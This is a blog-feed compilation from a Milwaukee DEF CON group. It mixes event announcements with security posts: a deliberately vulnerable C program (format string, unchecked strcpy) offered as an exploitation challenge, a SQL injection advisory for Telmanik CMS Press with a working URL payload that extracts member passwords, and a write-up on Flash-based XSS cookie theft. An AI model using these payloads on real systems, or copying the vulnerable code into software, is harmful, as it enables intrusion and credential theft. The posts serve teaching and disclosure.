Its time for Steph, Alex, and dc414’s annual Halloween party! 🙂 As usual, costumes are recommended but not required. Trick or treat runs 6-8pm – Watch for kids if you come during that time.
We will have chili and other food (and I promise, more dairy free options this time around!). Feel free to bring drinks or a dish to share.
Contact Anarchy Angel for directions – anarchy at dc414 dot org
At the last meeting I showed everyone how to use a format string vulnerability in a password storage app to bypass the master password and pull data out of memory. That is just one way to exploit this type of vulnerability so I challanged everyone at the meeting to get the app I used “code below” to execute their supplied input. The first person to let me know they got it and do a demo get $20! So it pays to be a little early.
#include < stdio.h >
#include < string.h >
int main (int argc, char *argv[])
{
char** spw = "dc414 pwnz";
char text[1025];
strcpy(text, argv[1]);
if (strcmp(text, "asd123")==0) {
printf("Correct the password is %s \n",spw);
return 0;
}
printf(text);
printf(" is wrong\n");
return 0;
}
FOR IMMEDIATE RELEASE
BarCampMilwaukee 8
Milwaukee, WI
For the eighth consecutive year, BarCampMilwaukee is returning to Bucketworks the first weekend in October. Bucketworks will host the event at its current Grand Avenue location. Doors open at 9:00 AM, Saturday October 5th.
A BarCamp is a wholly unique event that provides a free, open-environment forum where the participants are in charge of what happens. It is an interactive conversation where professionals and curious alike come to learn, teach, and imagine. This revolutionary “unconference” allows participants to float from one session to another, and encourages the development of interesting ideas and spontaneous discussion. Since the first BarCamp in the US eight years ago, hundreds of BarCamps have been organized throughout the world.
Throughout BarCampMilwaukee’s eight year run, participants have been involved in a wide array of session topics ranging from:
Software Development: Ruby on Rails, Drupal, and JavaScript.
Technologies: 3d printing/scanning, video editing, robots, and solutions for non-profits.
Solutions for small businesses and non-profits.
All the way to things like Zombie Defense Preparation, lockpicking, sushi making, and many other topics for makers, DIYers, artists and other creatives.
Register for BarCampMilwaukee 8 at barcampmilwaukee.org
Bucketworks is a “health club for the brain.” A co-working, meetup, and practice space for creative professionals offering memberships and space rentals for the community. Bucketworks is a program of The School Factory, a 501(c)(3) nonprofit organization that builds value-creating communities and spaces to transform education, economy, and talent.
When: Doors open Saturday, October 5th at 9:00 AM and close at 9:00 PM
Where: Bucketworks -161 West Wisconsin Avenue, Milwaukee, WI 53203
PRESS CONTACT:
Tim Syth (grow@bucketworks.org)
Director, Bucketworks (414.301.1414)
Because we are still looking for a new home our next meeting will be at The Meetupery:
N69W25055 Indiangrass Lane
Suite G
Sussex, WI 53089
Consider this a little test drive of a new space just opening up. Donations are encouraged. Cash and/or a non-perishable food items.
Can’t make it in person? Add dc414 to one of your circles in Google+
and join our Hangout!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]
you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with “_”.
Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members
This is a special DefCon 21 kick off from me! See ya there 😉
Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny
Here are a few tips and guidelines to follow while in Vegas:
Let me start by saying many thanks to Milwaukee Makerspace for hosting our meeting and to Klaiviel for hooking us up. Ulic got us rolling and gave a awesome presentation on PRISM and other government spying programs. dw5304 was up next and did his cable modem magic for us. Then Klaiviel showed us how to crash RC planes and quad-copters. After words he gave us the grand tour of Makerspace. The rest of the night everyone socialized while vlad, darkwind, and Klaiviel crashed a quad-copter.
UPDATE:
You can get a copy of Ulic’s slides HERE enjoy 🙂
Have a awesome 4th Merica and thanks to our service men and women for their sacrifice.
It looks like we’re meeting at the Makerspace since Klaiviel has the secured a slot already.
So just meet at
2555 S. Lenox St.
Milwaukee, WI, 53207
on Friday at 7PM.
A few meetings ago i gave a demo on uploading a flash file to file hosting sites that contains a evil XSS payload. Here is my write up on it.
A while back I was doing a penetration test on a friends file hosting service application. His service allowed the uploading of flash files and when you viewed the files detail page it showed you a preview of the flash movie. At the time I knew you could use actionscript to put javascript in a flash file but I was not sure if it would have full access to the DOM and allow us to do evil stuff.
I started messing around in actionscript and came up with this:
After compiling it and uploading, when viewing the preview page I was greeted with a prompt box that had the contents of my cookie for that domain and it was displayed in text with in the flash embed! So, just like that we are able to manufacture a XSS vulnerability on a application that is otherwise secure.
There is some protection for this attack. When you embed a flash file in a web page that you don’t trust you should add the allowScriptAccess param and set it to none. However this can be bypassed easily, just go to the swf file itself and it will still execute the javascript supplied by our swf file. This means to be fully protected you will also need to use a modrewrite rule to force a download when ever someone tries to view a swf file directly.
Here is one example – http://www.ziddu.com/viewfile/22413513/xss.swf.html
Here is another – http://swfchan.org/2335/xss.swf